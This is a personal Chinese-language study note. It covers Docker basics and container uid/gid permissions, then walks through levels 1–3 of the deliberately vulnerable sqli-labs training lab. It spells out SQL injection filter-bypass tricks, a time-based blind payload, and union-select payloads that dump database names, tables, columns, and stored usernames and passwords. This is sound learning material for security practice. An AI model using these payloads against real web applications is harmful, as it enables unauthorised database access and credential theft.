



# 针对过滤性的SQL相关

## Docker基础指令

* docker启动：docker service start

* docker容器的启动：docker run -d -p --name xxx REPOSITORY:TAG       #根据镜像启动容器      -d:让容器在后台运行  

  -P:将容器内部使用的网络端口映射到我们使用的主机上 

  -p:自定义端口，例：-p 8002:80,将容器80端口映射到宿主机8002端口

  --name:指定容器名字

* 查看运行中的容器：docker ps 

* 查看所有容器：docker ps -a

* 启动容器：docker start 容器ID

* 停止容器：docker stop 容器ID

* 重启容器：docker restart 容器ID

* 删除容器：docker rm 容器ID

* 删除全部容器：docker rm 'docker ps -aq'

## docker容器与虚拟机

__同一主机__上的所有容器共用一个主机上的内核，即成百上千的容器运行在docker宿主机上，但__内核控制的uid和gid只有一套__——同一个uid在宿主机容器中代表的是同一个用户（即便不同地方显示不同用户名）

__普通的用来显示用户名的 Linux 工具并不属于内核(比如 id 等命令)，所以我们可能会看到同一个 uid 在不同的容器中显示为不同的用户名。但是对于相同的 uid 不能有不同的特权，即使在不同的容器中也是如此。__

## docker权限相关

Linux系统下，权限由uid,gid负责(uid,gid由linux内核负责管理)，Linux执行命令前会检查进程的uid，gid来确认其是否有权限来进行操作(并不是通过用户名和用户组来确认，所以将)

### docker中命令默认使用root用户权限(非sudo)

![87E1BFEE-F7AF-4C35-9F90-0885F0B0EC5D](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/87E1BFEE-F7AF-4C35-9F90-0885F0B0EC5D.png)

可知当前用户名uid为1000

* 验证默认使用root用户权限

  * 新建sleep用户，以sleep用户权限启动容器并在有root权限的磁盘测试

* 将用户加入docker用户组

  * 创建docker用户组

    sudo groupadd docker

  * 普通用户加入docker用户组

    sudo usermod -aG docker $用户名

  * 重启docker

    sudo systemctl restart docker

  * 切换用户

    su root      #切换为root

    su $用户名     #切换为普通用户

## sqli-labs之于dokcer搭建(-dt,--rm问题没解决)

* 启动docker，拉环境：docker pull acgpiano/sqli-labs
* 创建容器，启动环境：docker run -dt --name sqli -p 80:80 -p 13306:3306 --rm acgpiano/sqli-labs
  * -dt和--rm __可能固定格式？__
  * --name指的是启动的容器的名称 
  * -p指的是启动的端口，映射了两个端口，一个是Apache服务的，一个是mysql服务的
  * 13306是宿主机端口，3306是容器中的端口

* 浏览器输入localhost自动进入

## 符号过滤

* 基本绕过空格	注释代替空格，Tab代替空格，%a0代替空格

* 括号绕过空格    MySQL，括号用来包围子查询

  ​							   常用于timebased盲注：

  ​								?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23	【其中from for属于逗号绕过】

* 绕过引号            id='users'若引号被过滤，则可以尝试将users转化为16进制——7573657273,故变为 id=0x7573657273

* 绕过逗号            limit用from或offset代替，substr用from for代替

* 比较符绕过        用比较函数代替

* or and绕过        ｜｜，&&

* 注释符绕过         id=1'union select 1,2,3||'1     【最后的or '1闭合查询语句的最后的单引号】

## 1

* 相关函数:
  * version()：查看数据库版本号
  * user()：查看当前用户
  * database()：查看使用的数据库
  * limit：分批获得所有数据
  * group_concat()：一次性获得数据库信息

* 具体过程

  * 寻找注入点

  * 查看其字段数,下图说明有3列

    ![7DD25157-DEE9-4230-B665-4A7B66F5B22D](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/7DD25157-DEE9-4230-B665-4A7B66F5B22D.png)

    ![3004BD4A-3709-4E6F-85DE-58E3EBF79F00](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/3004BD4A-3709-4E6F-85DE-58E3EBF79F00.png)

    可知其字段数为3

  * 使用联合查询获取数据库基本信息

    ![image-20210124103027314](/Users/lorelei/Library/Application Support/typora-user-images/image-20210124103027314.png)

    id=-1'(或id=1'and 1=2)使其数据库查询语句失效，--+(或%23)注释后端的查询语句。

  * 爆出数据库所有库名——group_concat()一次性获得数据库信息

    Payload: id=-1'union select 1,2,group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --+

    Note: schema可理解为database的替换

    ![A7C8D3A9-CD07-45A5-878A-61D293A8534C](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/A7C8D3A9-CD07-45A5-878A-61D293A8534C.png)

    其中：information_schema是mysql-5.0 以上版本自带的信息数据库。

    ​			此外，performance_schema用于性能分析，information_schema用于存储数据库元数据

  * 具体爆出数据库中表名

    Payload:id=-1'union select 1,2,(select group_concat(TABLE_NAME)from information_schema.tables where table_schema = 'security') --+

    ![C861CEBF-8FFE-41DB-A80E-4451E768D72A](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/C861CEBF-8FFE-41DB-A80E-4451E768D72A.png)

    其余表中数据以此类推

  * 爆出表中具体信息

    Payload:id=-1'union select 1,2,(select group_concat(COLUMN_NAME) from information_schema.columns where table_name='users') --+![986C54AE-BA43-4253-9482-F82E3A1C46B8](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/986C54AE-BA43-4253-9482-F82E3A1C46B8.png)

  * 爆出用户名和密码
  
    Payload: id=-1' union select 1,(select group_concat(password) from security.users) ,(select group_concat(username) from security.users) --+![D028DBBE-B760-476E-98CF-D50B1A2FA431](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/D028DBBE-B760-476E-98CF-D50B1A2FA431.png)

## 2

基本流程同1。

不过1是字符型，2是整型。

## 3(带括号的sql)

容易测试出是整形注入

猜测其sql语句为? :$sql = select * from user where id=('$id');

故思路为闭合前括号，注释后一个括号；后续过程同1，2

* order by测试出其字段为3
* 获取数据库信息 ![image-20210124164412864](/Users/lorelei/Library/Application Support/typora-user-images/image-20210124164412864.png)

* 获取数据库名![40E1F4DE-79A2-4B89-81BA-985867F49632](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/40E1F4DE-79A2-4B89-81BA-985867F49632.png)

* 获取数据库security中表名![4D6E2A23-39DE-4FAC-BF5D-5D169C396ECB](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/4D6E2A23-39DE-4FAC-BF5D-5D169C396ECB.png)

* 获取users表中列信息![3F29B900-C099-40BB-9EFD-2CE468C06ED0](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/3F29B900-C099-40BB-9EFD-2CE468C06ED0.png)

* 获取users中username,password信息￼![29AA3C9E-BC6D-45B7-9067-EB95A6023145](/Users/lorelei/Library/Containers/com.tencent.qq/Data/Library/Application Support/QQ/Users/1339520365/QQ/Temp.db/29AA3C9E-BC6D-45B7-9067-EB95A6023145.png)

